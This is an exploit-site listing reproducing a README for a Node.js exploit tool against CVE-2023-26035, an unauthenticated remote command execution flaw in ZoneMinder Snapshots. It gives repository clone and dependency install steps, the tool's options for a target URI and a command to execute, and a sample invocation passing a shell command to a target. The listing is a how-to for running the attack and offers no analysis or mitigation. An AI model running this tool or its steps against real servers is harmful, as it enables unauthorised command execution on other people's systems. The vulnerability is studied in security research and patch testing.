Share
## https://sploitus.com/exploit?id=468818B4-DCA4-5D31-85EE-089529AA6813
# CVE-2023-26035
ZoneMinder Snapshots - Unauthenticated
![image](https://github.com/Yuma-Tsushima07/CVE-2023-26035/assets/63207324/c4666544-871c-496b-8b35-6011a0f36e96)
![image](https://github.com/Yuma-Tsushima07/CVE-2023-26035/assets/63207324/798ca08e-95bc-433e-8862-d9bca4560f05)
## Install
**Grab Repo**
```bash
$ git clone https://github.com/Yuma-Tsushima07/CVE-2023-26035.git
```
**Setup**
> Note: Install the latest version of `node`
```bash
$ npm init
$ npm i axios cheerio yargs
```
## Usage
```
โโ[โ]โ[v37r1x@7h3B14ckKn1gh75]โ[~/Documents/Code/CVE-2023-26035]
โโโโผ $node exp.js -h
Options:
--version Show version number [boolean]
-t, --target Target URI (e.g., http://example.com/zm/) [string] [required]
-c, --cmd Command to execute on the target [string] [required]
-h, --help Show help [boolean]
```
```
โโ[v37r1x@7h3B14ckKn1gh75]โ[~/Documents/Code/CVE-2023-26035]
โโโโผ $node exp.js -t http://127.0.0.1:8888/ --cmd '<shell>'
```
## Credits
- [rvizx](https://github.com/rvizx/CVE-2023-26035)